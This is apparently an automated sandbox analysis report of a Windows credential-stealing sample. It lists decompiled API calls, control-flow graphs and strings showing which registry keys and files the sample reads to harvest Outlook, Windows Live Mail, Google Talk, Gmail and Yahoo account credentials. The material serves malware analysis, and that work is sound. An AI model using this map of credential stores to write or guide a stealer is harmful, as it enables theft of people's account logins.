                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                      • API String ID: 3151552205-317895162

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                      • String ID: 2t
                                                                                                                                                                                                                      • API String ID: 3662548030-3527913779

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$memcpy$EnumFreeLibraryLoadLocalOpenQueryValuememset
                                                                                                                                                                                                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                                        • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValuememset$CloseFreeLibraryLoadLocalOpen_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                      • String ID:

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                      • String ID: %s@yahoo.com

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 411 4036e5-4036f5 412 4037c6-4037c7 411->412 413 4036fb-403709 call 410863 411->413 415 40370e-403710 413->415 416 4037c5 415->416 417 403716-40372a strchr 415->417 416->412 417->416 418 403730-403787 call 4021b6 _mbscpy * 2 strlen 417->418 421 4037a4-4037c0 _mbscpy call 4023e5 418->421 422 403789-4037a1 sprintf 418->422 421->416 422->421
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                      • String ID: %s@gmail.com

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 424 404a99-404ac2 LoadLibraryA 425 404ac4-404ad2 424->425 426 404aec-404af4 424->426 430 404ad4-404ad8 425->430 431 404add-404ae6 FreeLibrary 425->431 429 404af5-404afa 426->429 433 404b13-404b17 429->433 434 404afc-404b12 MessageBoxA 429->434 435 404adb 430->435 431->426 432 404ae8-404aea 431->432 432->429 435->431
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 436 4034e4-403544 memset * 2 call 410b1e 439 403580-403582 436->439 440 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 436->440 440->439
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 445 410863-41088b UuidFromStringA * 2 446 4108dd 445->446 447 41088d-41088f 445->447 448 4108df-4108e2 446->448 447->446 449 410891-4108aa call 410827 447->449 451 4108af-4108b1 449->451 451->446 452 4108b3-4108b9 451->452 453 4108bb-4108bd 452->453 454 4108be-4108db memcpy CoTaskMemFree 452->454 453->454 454->448
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFolderLibraryLoadPathSpecialVersion_mbscpymemset
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$Enummemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1615280680-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 3677997916-1155512374
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: eBD
                                                                                                                                                                                                                      • API String ID: 823142352-44267735
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
